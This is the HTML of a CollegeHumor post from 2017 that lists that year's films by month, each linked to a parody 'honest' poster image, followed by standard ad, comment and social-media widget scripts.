<h2 style="text-align: center;"><span style="text-decoration: underline;">APRIL</span></h2>
<p><br /><br /></p>
<h2>The Fate of the Furious</h2>
<p><img src="https://media0ch-a.akamaihd.net/95/62/5d86f181b2e4940f9eac9a2a8d9900f2.jpg" id="16390023" data-image-id="16390023" height="1152" width="728" alt="undefined" data-frame="fullsize" /></p>
<p></p>
<p><br /><br /></p>
<h2>The Smurfs: The Lost Village</h2>
<p><img src="https://media0ch-a.akamaihd.net/80/42/cf3649292e95a9f7f5b96383f0e3811b.jpg" id="16390024" data-image-id="16390024" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Going In Style</h2>
<p><img src="https://media0ch-a.akamaihd.net/10/41/4885499175ca74b9afd3e8d545fa4a7f.jpg" id="16390027" data-image-id="16390027" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Sandy Wexler</h2>
<p><img src="https://media0ch-a.akamaihd.net/98/56/d372652eff6d3145861c497c1b8ef1bc.jpg" id="16390053" data-image-id="16390053" height="1022" width="728" alt="If Movie Posters Were Honest (April 2017 Edition)" data-frame="fullsize" /></p>
<p></p>
<h2><br />The Promise</h2>
<p><img src="https://media0ch-a.akamaihd.net/68/27/46f29b1129ba67d09900767c70dc5a0d.jpg" id="16390025" data-image-id="16390025" height="1077" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Unforgettable</h2>
<p><img src="https://media0ch-a.akamaihd.net/71/44/fcbcfa580826f016f93c2425db7b5ae2.jpg" id="16390022" data-image-id="16390022" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p></p>
<h2><br />The Circle</h2>
<p><img src="https://media0ch-a.akamaihd.net/59/44/951352b71d1392e3bc793d604e1cb1b3.jpg" id="16390026" data-image-id="16390026" height="1024" width="691" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p></p>
<h2 style="text-align: center;"><br /><br /></h2>
<h2 style="text-align: center;"><span style="text-decoration: underline;">MAY</span></h2>
<p></p>
<p></p>
<h2>Guardians of the Galaxy Vol. 2</h2>
<p><img src="https://media0ch-a.akamaihd.net/52/72/f016a564dc16deab8b3ae3dbbd094677.jpg" id="16402062" data-image-id="16402062" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>King Arthur: Legend of the Sword</h2>
<p><img src="https://media0ch-a.akamaihd.net/10/14/1707fa9400271dbe6431ee6deb8d2d69.jpg" id="16402063" data-image-id="16402063" height="1079" width="728" alt="If Movie Posters Were Honest (May 2017 Edition)" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Snatched</h2>
<p><img src="https://media0ch-a.akamaihd.net/72/15/7feb0e256bf1d0274511e17f025fbbde.jpg" id="16402058" data-image-id="16402058" height="981" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Alien: Covenant</h2>
<p><img src="https://media0ch-a.akamaihd.net/10/91/81301f33af86b9a64b82dd1efb5fecef.jpg" id="16402059" data-image-id="16402059" height="1080" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Baywatch</h2>
<p><img src="https://media0ch-a.akamaihd.net/86/39/6cd41b9d8d581d381187c834138fdcb8.jpg" id="16402066" data-image-id="16402066" height="822" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Pirates of the Caribbean: Dead Men Tell No Tales</h2>
<p><img src="https://media0ch-a.akamaihd.net/30/46/4a514239ebfa557a82b2df042a8cbab0.jpg" id="16402060" data-image-id="16402060" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Wakefield</h2>
<p><img src="https://media0ch-a.akamaihd.net/83/44/cde085a0befb29ee7ac65775a09ebcdb.jpg" id="16402061" data-image-id="16402061" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;"><br />JUNE</span></h2>
<p></p>
<h2>Wonder Woman</h2>
<p><img src="https://media0ch-a.akamaihd.net/60/10/d69e9d3d95efd558b1dc16a5529882c7.jpg" id="16417036" data-image-id="16417036" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Captain Underpants: The First Epic Movie</h2>
<p><img src="https://media0ch-a.akamaihd.net/92/51/d7f95efcc2ba9a41b670277327da8864.jpg" id="16417037" data-image-id="16417037" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Mummy</h2>
<p><img src="https://media0ch-a.akamaihd.net/23/31/88a43ee0b237bc3549069908065668dd.jpg" id="16417039" data-image-id="16417039" height="1153" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Cars 3</h2>
<p><img src="https://media0ch-a.akamaihd.net/35/16/f1c7a61f33b180d5b459cb1c0f235230.jpg" id="16417034" data-image-id="16417034" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Despicable Me 3</h2>
<p><img src="https://media0ch-a.akamaihd.net/76/86/0ad5318631b8f4e3168a0eb929e7e990.jpg" id="16417066" data-image-id="16417066" height="3166" width="2000" alt="If Movie Titles Were Honest (June 2017 Edition)" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Transformers: The Last Knight</h2>
<p><img src="https://media0ch-a.akamaihd.net/64/31/68cc43c639fd496439b336070be874e6.jpg" id="16417038" data-image-id="16417038" height="1135" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Baby Driver</h2>
<p><img src="https://media0ch-a.akamaihd.net/70/16/d1f1af23af819a3bb6be3917782d221d.jpg" id="16417035" data-image-id="16417035" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p><br /><br /></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;">JULY</span></h2>
<p></p>
<h2>Spider-Man: Homecoming</h2>
<p><img src="https://media0ch-a.akamaihd.net/44/71/f380bc3b5ca5bc2453d5416d6a4de651.jpg" id="16425567" data-image-id="16425567" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>War For the Planet of the Apes</h2>
<p><img src="https://media0ch-a.akamaihd.net/13/98/5f5a47f73ebfd06198ab758f0f8b9962.jpg" id="16425569" data-image-id="16425569" height="1024" width="692" alt="If Movie Titles Were Honest (July 2017 Edition)" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Valerian and the City of a Thousand Planets</h2>
<p><img src="https://media0ch-a.akamaihd.net/22/27/7ab308a669a00fe995bd5ed15d9752ad.jpg" id="16425566" data-image-id="16425566" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Dunkirk</h2>
<p><img src="https://media0ch-a.akamaihd.net/10/84/17384d0e782e2b00a99cb9a5819432e0.jpg" id="16425564" data-image-id="16425564" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Atomic Blonde</h2>
<p><img src="https://media0ch-a.akamaihd.net/77/76/f5f108863273596c540e58bbda956bb6.jpg" id="16425563" data-image-id="16425563" height="1153" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Emoji Movie</h2>
<p><img src="https://media0ch-a.akamaihd.net/60/11/75e127f29d1d39208591ab802132b4d2.jpg" id="16425565" data-image-id="16425565" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<h2 style="text-align: center;"><br /><br /></h2>
<hr />
<p></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;"><br />AUGUST</span></h2>
<p><br /><br /></p>
<h2>The Dark Tower</h2>
<p><img src="https://media0ch-a.akamaihd.net/36/34/3f373ca11c23327cb86a0e8a8c803718-if-every-movie-this-year-had-honest-posters.jpg" id="16467008" data-image-id="16467008" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;"><br />SEPTEMBER</span></h2>
<p></p>
<h2>IT</h2>
<p><img src="https://media0ch-a.akamaihd.net/49/64/a5bfc33d5b047fa5f271865246355fab.jpg" id="16449355" data-image-id="16449355" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<h2><br />American Made</h2>
<p><img src="https://media0ch-a.akamaihd.net/33/78/9a295673c9ff94918d47cc565609b3ba.jpg" id="16449358" data-image-id="16449358" height="1153" width="728" alt="If Movie Posters Were Honest (September 2017 Edition)" data-frame="fullsize" /></p>
<h2><br />mother!</h2>
<p><img src="https://media0ch-a.akamaihd.net/76/83/c9e638e0b5bc88e1ae96e929341e2839.jpg" id="16449359" data-image-id="16449359" height="1090" width="728" alt="undefined" data-frame="fullsize" /></p>
<h2><br />The Lego Ninjago Movie</h2>
<p><img src="https://media0ch-a.akamaihd.net/67/65/28e366ed14e8698e3348e36b4257abda.jpg" id="16449357" data-image-id="16449357" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<h2></h2>
<h2><br />Battle of the Sexes</h2>
<p><img src="https://media0ch-a.akamaihd.net/33/31/ec6266cf86faeeb7ec899feea4fa061e.jpg" id="16449356" data-image-id="16449356" height="1085" width="728" alt="undefined" data-frame="fullsize" /></p>
<h2><br />Stronger</h2>
<p><img src="https://media0ch-a.akamaihd.net/89/27/52cefe2ebfcd663dcab44c77e3a7c979.jpg" id="16449354" data-image-id="16449354" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<h2><br />The Kingsmen 2: The Golden Circle</h2>
<p><img src="https://media0ch-a.akamaihd.net/63/15/b3b72d3a0524dc7bb9722806e5503e7d.jpg" id="16449353" data-image-id="16449353" height="755" width="509" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p></p>
<p></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;">OCTOBER</span></h2>
<p><br /><br /></p>
<h2>Blade Runner 2049</h2>
<p><img src="https://media0ch-a.akamaihd.net/83/74/1247a21156df20caed42e432af1bfee7.jpg" /></p>
<p><br /><br /></p>
<h2>The Foreigner</h2>
<p><img src="https://media0ch-a.akamaihd.net/14/92/ece5e3a59bd447ce9acf02251f738f7d.jpg" /></p>
<p></p>
<h2>Geostorm</h2>
<p><img src="https://media0ch-a.akamaihd.net/44/63/e13b837888df34b79b0c7f8c697ad70c.jpg" /></p>
<p><br /><br /></p>
<h2>BOO! 2</h2>
<p><img src="https://media0ch-a.akamaihd.net/84/74/5c16bd02fb0f2518b4ee73a06a4d7c1f.jpg" /></p>
<p><br /><br /></p>
<h2>Jigsaw</h2>
<p><img src="https://media0ch-a.akamaihd.net/85/34/a67a2e7f183d91d5aa9d4bb6079ea83f.jpg" id="16453787" data-image-id="16453787" height="1023" width="673" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Suburbicon</h2>
<p><img src="https://media0ch-a.akamaihd.net/21/19/fea9f1b375cefc969e8a7efbb2b3ed38.jpg" /></p>
<p><br /><br /></p>
<h2>Marshall</h2>
<p><img src="https://media0ch-a.akamaihd.net/90/78/e2b8ee9d05e76cf3455af519a8443da8.jpg" /></p>
<p></p>
<p></p>
<hr />
<p></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;"><br />NOVEMBER</span></h2>
<p></p>
<h2>Thor: Ragnarok</h2>
<p><img src="https://media0ch-a.akamaihd.net/62/45/40caff00f2cc9dfa568e38ddfd6a12e5.jpg" id="16461703" data-image-id="16461703" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>A Bad Moms Christmas</h2>
<p><img src="https://media0ch-a.akamaihd.net/24/89/9aa245b77b6bcaf988664821200c0f50.jpg" id="16461704" data-image-id="16461704" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Murder on the Orient Express</h2>
<p><img src="https://media0ch-a.akamaihd.net/81/59/3f2b1f98c0f3cea3b4c5102ab1360d40.jpg" id="16461716" data-image-id="16461716" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Daddy's Home 2</h2>
<p><img src="https://media0ch-a.akamaihd.net/74/66/ff1131cbf61eeab8eaea90e5557b6877.jpg" id="16461717" data-image-id="16461717" height="1294" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Justice League</h2>
<p><img src="https://media0ch-a.akamaihd.net/70/24/9746cc7efc455f3680ad5ff93d131818.jpg" id="16461718" data-image-id="16461718" height="1114" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Roman J. Israel, Esq.</h2>
<p><img src="https://media0ch-a.akamaihd.net/72/94/ff17e44790adab3f8bac1ab0f626ab2d.jpg" id="16461719" data-image-id="16461719" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Coco</h2>
<p><img src="https://media0ch-a.akamaihd.net/58/72/82f6c7dbe0cc1b39ee126e4e58cb5ba3.jpg" id="16461720" data-image-id="16461720" height="1041" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<hr />
<p><br /><br /></p>
<h2 style="text-align: center;"><span style="text-decoration: underline;">DECEMBER</span></h2>
<p></p>
<h2>The Disaster Artist</h2>
<p><img src="https://media0ch-a.akamaihd.net/46/82/d775a8315e25acdf3a4012c53bfb1c34.jpg" id="16466947" data-image-id="16466947" height="728" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>I, Tonya</h2>
<p><img src="https://media0ch-a.akamaihd.net/47/18/5e968128c61883e4ad7e8d4ceded3a47.jpg" id="16466951" data-image-id="16466951" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Bright</h2>
<p><img src="https://media0ch-a.akamaihd.net/16/67/45dc1869059b8bc9b29add711963c747.jpg" id="16466954" data-image-id="16466954" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Shape of Water</h2>
<p><img src="https://media0ch-a.akamaihd.net/87/88/bbb4b446b3d776cdc426939fc2a66ed4.jpg" id="16466949" data-image-id="16466949" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>The Greatest Showman</h2>
<p><img src="https://media0ch-a.akamaihd.net/81/35/11209315b318216c44bcc7b8fa1f81b6.jpg" id="16466952" data-image-id="16466952" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Star Wars: The Last Jedi</h2>
<p><img src="https://media0ch-a.akamaihd.net/76/95/97103ac7204a1931d41413eacae99658.jpg" id="16466950" data-image-id="16466950" height="1078" width="728" alt="undefined" data-frame="fullsize" /></p>
<p><br /><br /></p>
<h2>Downsizing</h2>
<p><img src="https://media0ch-a.akamaihd.net/42/76/5bcdfa54fd7faa35ec8bf93a7153e80e.jpg" id="16466946" data-image-id="16466946" height="1024" width="656" alt="undefined" data-frame="fullsize" /></p>
<p></p>
<p><br /><br /></p>
<h2>Jumanji: Welcome To the Jungle</h2>
<p><img src="https://media0ch-a.akamaihd.net/69/91/0545a238e6671e3fc25fcac4eec26b5f.jpg" id="16466948" data-image-id="16466948" height="1079" width="728" alt="undefined" data-frame="fullsize" /></p>	        <script type='application/ld+json'>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</script>		</div>

		<!-- Begin: Taboola Recommendations (widget) -->
		<div id="taboola-mobile-below-article-thumbnails"></div>
		<div id="taboola-below-article-thumbnails"></div>
		<script type="text/javascript">
			window._taboola = window._taboola || [];
			_taboola.push({
				mode: 'thumbnails-m',
				container: 'taboola-mobile-below-article-thumbnails',
				placement: 'Mobile Below Article Thumbnails Int',
				target_type: 'mix'
			});
			_taboola.push({
				mode: 'thumbnails-a-abp',
				container: 'taboola-below-article-thumbnails',
				placement: 'Below Article Thumbnails',
				target_type: 'mix'
			});
			_taboola.push({article:'auto'});
		</script>
		<!-- End: Taboola Recommendations (widget) -->

        					<div class="pull-left">
							</div>
							
				<div id="comments" class="cf">
		<div class="comments-share-wrapper cf">
			<button class="fb-comments-toggle"><i class="icon-comments"></i> Comments <i class="caret-toggle icon-caret-down"></i></button>
			
	<div class="share-bar share-bar-media ga-feature-usage" data-ga-feature="Share Module" data-url="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters">
		<ul class="large">
																<li><a data-ga-category="Share Module" data-ga-label="Facebook"  href="http://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.collegehumor.com%2Fpost%2F7054446%2Fif-every-movie-this-year-had-honest-posters" title="Facebook"><span class="btn-share btn-share-facebook icon-facebook"  ></span></a></li>
														<li><a data-ga-category="Share Module" data-ga-label="Twitter"  href="https://twitter.com/intent/tweet?related=dorkly&amp;text=If%20Every%20Movie%20This%20Year%20Had%20Honest%20Posters&amp;url=http%3A%2F%2Fwww.collegehumor.com%2Fpost%2F7054446%2Fif-every-movie-this-year-had-honest-posters&amp;via=CollegeHumor" title="Twitter"><span class="btn-share btn-share-twitter icon-twitter"  ></span></a></li>
				</ul>
				<div class="form form-copy-url hide">
			<input type="text" id="copy-url" class="form-control" value="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters">
		</div>
					<div class="form form-copy-embed hide">
				<input type="text" id="copy-embed" class="form-control" value="&lt;iframe src=&quot;http://www.collegehumor.com/e/7054446&quot; width=&quot;600&quot; height=&quot;369&quot; frameborder=&quot;0&quot; webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;div style=&quot;padding:5px 0; text-align:center; width:600px;&quot;&gt;&lt;p&gt;&lt;a href=&quot;//www.collegehumor.com/videos/most-viewed/this-year&quot;&gt;CollegeHumor&amp;#039;s Favorite Funny Videos&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;">
			</div>
			</div>
		</div>
		<div class="fb-comments-wrapper hide">
					<div class="fb-comments" data-href="http://www.collegehumor.com/post/7054446/if-every-movie-this-year-had-honest-posters" data-width="100%" data-colorscheme="light" data-num-posts="10" data-order-by="social" data-mobile="auto-detect"></div>
				</div>
	</div>
	</div>
</div>
	<div id="sidebar">
		<div class="col-sm-12 col-md-4">
			<aside class="sidebar">
				<div class="pod pod-large pod-ad cf">
					<article><div id="ad-right-rail-top" adonis-marker><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-right-rail-top"); }); }</script></div></article>
				</div>
				<div id="ad-right-rail-middle"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-right-rail-middle"); }); }</script></div>								<script>
var readThisList = ["7054483","7052808","7052198","7053695","7052259","7054248","7053604","7053189","7052283"];
</script>
<section class="zergnet-widget-sidebar-container fitvidsignore"></section>				<div id="taboola-right-rail-thumbnails"></div>
				<script type="text/javascript">
				  window._taboola = window._taboola || [];
				  _taboola.push({
				    mode: 'thumbnails-rr',
				    container: 'taboola-right-rail-thumbnails',
				    placement: 'Right Rail Thumbnails',
				    target_type: 'mix'
				  });
				</script>
								<div id="ad-right-rail-bottom"></div>
							</aside>
		</div>
	</div>

<div id="loader" class="clear cf"><img src="http://0.media.collegehumor.cvcdn.com/24/13/e6f8b2c173bfbe53eae438d3f3ecd094.gif" alt=""></div>

<!-- Twitter widget initialization -->
<script>window.twttr = (function(d, s, id) {var js, fjs = d.getElementsByTagName(s)[0], t = window.twttr || {}; if (d.getElementById(id)) return t; js = d.createElement(s); js.id = id; js.src = "https://platform.twitter.com/widgets.js"; fjs.parentNode.insertBefore(js, fjs); t._e = []; t.ready = function(f) {t._e.push(f); }; return t; }(document, "script", "twitter-wjs"));</script>

<script>
 if($('.royalSlider').length) {
 	$.getScript('/jument/js/jquery.royalslider.min.js', function() {
		$.getScript('/jument/js/jquery.royalslider.ch.js', function(){});
 	});
 }
</script>

<!--VIEWDATA:7054446-->

			</div>
							<!-- Facebook like box -->
				<div class="hiding" id="like-box">
					<div class="title-like-box" >We like you. Do you like us too?</div>
					<div class="fb-like-box" data-href="http://www.facebook.com/collegehumor" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false"></div>
					<br>
					<div class="no-show"><a href="#">Don't ask me again.</a></div>
				</div>
					</div>
	</div>
	<footer class="site-footer">
	<div class="container cf">
		<div class="row">
			<div class="col-xs-12 col-sm-12 col-md-12">
				<ul class="footer-links ga-feature-usage col-xs-12 hidden-sm col-md-2" data-ga-feature="Footer Links" data-ga-category="Footer" data-ga-label="Footer Links">
											<li><a href="/about" data-ga-category="Footer" data-ga-label="Footer Links: About">About</a></li>
											<li><a href="/privacy" data-ga-category="Footer" data-ga-label="Footer Links: Privacy Policy">Privacy Policy</a></li>
											<li><a href="/terms" data-ga-category="Footer" data-ga-label="Footer Links: Terms & Conditions">Terms & Conditions</a></li>
											<li><a href="/contact" data-ga-category="Footer" data-ga-label="Footer Links: Contact">Contact</a></li>
									</ul>
				<ul class="footer-links split ga-feature-usage col-xs-12 hidden-sm col-md-2" data-ga-feature="Footer Links" data-ga-category="Footer" data-ga-label="Footer Links">
											<li><a href="/sitemap" data-ga-category="Footer" data-ga-label="Footer Links: Sitemap">Sitemap</a></li>
											<li><a href="/sitemap/index" data-ga-category="Footer" data-ga-label="Footer Links: Index">Index</a></li>
											<li><a href="mailto:ads@collegehumor.com" data-ga-category="Footer" data-ga-label="Footer Links: Advertise">Advertise</a></li>
											<li><a href="http://iac.com/careers/job-listings" data-ga-category="Footer" data-ga-label="Footer Links: Jobs">Jobs</a></li>
											<li><a href="http://www.dorkly.com/" data-ga-category="Footer" data-ga-label="Footer Links: Dorkly">Dorkly</a></li>
									</ul>
				<ul class="footer-links ga-feature-usage hidden-xs col-sm-3 hidden-md hidden-lg" data-ga-feature="Footer Links" data-ga-category="Footer" data-ga-label="Footer Links">
											<li><a href="/about" data-ga-category="Footer" data-ga-label="Footer Links: About">About</a></li>
											<li><a href="/privacy" data-ga-category="Footer" data-ga-label="Footer Links: Privacy Policy">Privacy Policy</a></li>
											<li><a href="/terms" data-ga-category="Footer" data-ga-label="Footer Links: Terms & Conditions">Terms & Conditions</a></li>
											<li><a href="/contact" data-ga-category="Footer" data-ga-label="Footer Links: Contact">Contact</a></li>
																<li><a href="/sitemap" data-ga-category="Footer" data-ga-label="Footer Links: Sitemap">Sitemap</a></li>
											<li><a href="/sitemap/index" data-ga-category="Footer" data-ga-label="Footer Links: Index">Index</a></li>
											<li><a href="mailto:ads@collegehumor.com" data-ga-category="Footer" data-ga-label="Footer Links: Advertise">Advertise</a></li>
											<li><a href="http://iac.com/careers/job-listings" data-ga-category="Footer" data-ga-label="Footer Links: Jobs">Jobs</a></li>
											<li><a href="http://www.dorkly.com/" data-ga-category="Footer" data-ga-label="Footer Links: Dorkly">Dorkly</a></li>
									</ul>
				<div class="col-xs-12 hidden-sm col-md-2">
					<ul class="social-links ga-feature-usage" data-ga-feature="Footer Social Links" data-ga-category="Footer" data-ga-label="Social">
						<li>Follow</li>
											<li><a href="http://www.facebook.com/CollegeHumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Facebook"><span class="icon-facebook"></span><span class="network-name">Facebook</span></a></li>
											<li><a href="http://blog.collegehumor.com/" target="_blank" data-ga-category="Footer" data-ga-label="Social: Tumblr"><span class="icon-tumblr"></span><span class="network-name">Tumblr</span></a></li>
											<li><a href="http://www.twitter.com/CollegeHumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Twitter"><span class="icon-twitter"></span><span class="network-name">Twitter</span></a></li>
											<li><a href="http://www.youtube.com/CollegeHumor?sub_confirmation=1" target="_blank" data-ga-category="Footer" data-ga-label="Social: YouTube"><span class="icon-youtube"></span><span class="network-name">YouTube</span></a></li>
										</ul>
				</div>
				<div class="hidden-xs col-sm-3 hidden-md hidden-lg">
					<ul class="social-links ga-feature-usage" data-ga-feature="Footer Social Links" data-ga-category="Footer" data-ga-label="Social">
						<li>Follow</li>
											<li><a href="http://www.facebook.com/CollegeHumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Facebook"><span class="icon-facebook"></span><span class="network-name">Facebook</span></a></li>
											<li><a href="http://blog.collegehumor.com/" target="_blank" data-ga-category="Footer" data-ga-label="Social: Tumblr"><span class="icon-tumblr"></span><span class="network-name">Tumblr</span></a></li>
											<li><a href="http://www.twitter.com/CollegeHumor" target="_blank" data-ga-category="Footer" data-ga-label="Social: Twitter"><span class="icon-twitter"></span><span class="network-name">Twitter</span></a></li>
											<li><a href="http://www.youtube.com/CollegeHumor?sub_confirmation=1" target="_blank" data-ga-category="Footer" data-ga-label="Social: YouTube"><span class="icon-youtube"></span><span class="network-name">YouTube</span></a></li>
										</ul>
				</div>
				<div class="col-xs-12 col-sm-3 col-md-2">
					<div id="newsletter">
						<div class="nav-subscribe">
							<a href="https://www.collegehumor.com/static/newsletter" class="nav-newsletter"><span class="nav-label">Subscribe</span></a>
						</div>
					</div>
				</div>
				<div class="col-xs-12 hidden-sm col-md-2">
				</div>
				<div class="col-xs-12 col-sm-3 col-md-2">
					<div class="site-logo"></div>
					<div class="site-copyright cf">CHMEDIA &copy;2017 Connected Ventures, LLC.<br /> All Rights Reserved.</div>
					<div class="top-block">
						<a href="#" class="scroll-to back-to-top ga-feature-usage ga-interaction ga-interaction-click-only" data-ga-feature="Scroll Top" data-ga-category="Footer" data-ga-label="Back to Top">Top of Page</a>
					</div>
				</div>
			</div>
		</div>
	</div>
</footer>
	<script type="text/javascript" defer src="http://0.static.collegehumor.cvcdn.com/js/packages/2fc4e35681c0687bcaff6186d537f582.js"></script>
	
	
			<div id="fb-root"></div>
<script>
	// setting facebook comment to take the width of the browser when we are on small device
	$( document ).ready(function() {
		var $browser_width = $( window ).width();
		if($browser_width >= 600){
			$browser_width = 600;
		}
		$('.fb-comments').attr('data-width',$browser_width - 30);
	});

	window.fbAsyncInit = function() {
		FB.init({
			appId: 271750421132,
			version: 'v2.7',
			status: true,
			cookie: true,
			oauth : true,
			xfbml: true
		});
		$('body').trigger('fbinit');
	};
	(function(d, s, id) {
		var js, fjs = d.getElementsByTagName(s)[0];
		if (d.getElementById(id)) return;
		js = d.createElement(s); js.id = id;
		js.src = "//connect.facebook.com/en_US/sdk.js";
		fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));
</script>	
		<div class="ad-adhesive-footer-wrapper">
		<div id="ad-adhesive-footer"><script type="text/javascript">if(typeof(googletag) != "undefined") { googletag.cmd.push(function() { googletag.display("ad-adhesive-footer"); }); }</script></div>	</div>
		<!-- Begin: Taboola Recommendations (flush) -->
	<script type="text/javascript">
		window._taboola = window._taboola || [];
		_taboola.push({flush: true});
	</script>
	<!-- End: Taboola Recommendations (flush) -->
	
	    <script>
      var adonis = adonis || {};
      adonis.conditionalAdRendering = true;
      adonis.scriptResources = ["prebid.js"];
      adonis.transport = 'https://9k6y.b2rrns9dgbx56tf5kc.agency/http';
    </script>
	<!-- Adonis loader.min.js --><script>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</script>
	</body>
</html>
